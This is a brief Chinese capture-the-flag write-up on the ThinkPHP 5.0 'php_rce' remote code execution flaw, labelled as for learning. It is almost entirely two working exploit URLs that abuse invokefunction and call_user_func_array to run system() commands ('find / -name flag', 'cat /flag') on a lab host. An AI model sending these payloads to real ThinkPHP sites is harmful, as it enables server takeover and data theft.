ThinkPHP 5.0 版本存在getshell漏洞 php_rce
查找flag:http://111.198.29.45:45747/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22 payload:http://111.198.29.45:45747/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag 得到flag 参考自: https://blog.csdn.net/weixin_45425482/article/details/103709085 学习用途 来源: https://www.cnblogs.com/clqnotes/p/12237295.html